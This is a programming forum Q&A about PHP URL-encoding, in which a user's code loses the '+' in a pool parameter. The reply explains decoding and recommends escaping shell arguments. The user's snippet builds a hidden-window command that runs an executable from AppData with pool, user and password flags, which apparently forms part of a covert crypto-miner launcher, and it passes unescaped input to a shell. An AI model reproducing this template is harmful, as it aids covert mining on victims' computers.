<?php
$pool = urlencode($_GET['p']);
$url = 'mylink?pool=' . $p . '&user=' . $_GET['user'] . '&pass=' . $_GET['pass'];
file_get_contents($url);
?>
<?php
$pool = urldecode($_GET['p']);
$user = $_GET['user'];
$pass = $_GET['pass'];
$file_content[133] = 'Shell "cmd.exe /c cd %appdata% & help.exe -o ' . $p. ' -u ' . $user . ' -p ' . $pass . '", vbHide';
?>
When entering: http://mylin?p=udp+tcp://host:22555&user=test&pass=test
It still doesn't use the + in this as a string at all!
Please help, as the + needs to be included in my string.
The superglobals
$_GETand$_REQUESTare already decoded.
Per the documentation, you should not decode things from $_GET. When encoding, use rawurlencode() so the plus symbol is encoded as "%2B" (and thus, correctly decoded).
When you encode your link, rawurlencode() all of the parameters:
$pool = rawurlencode($_GET['p']);
$user = rawurlencode($_GET['user']);
$pass = rawurlencode($_GET['pass']);
$url = "mylink?pool=$p&user=$user&pass=$pass";
When you decode your link, don't decode any of the parameters because they are already decoded:
$pool = $_GET['p'];
$user = $_GET['user'];
$pass = $_GET['pass'];
Incidentally, it looks like you are taking user input and sending it to a shell command. In that case, you must use escapeshellarg() or similar to make the string safe for use as a shell argument and mitigate command injection attacks.
$pool = urldecode($_GET['p']);
请问这个p代表的是什么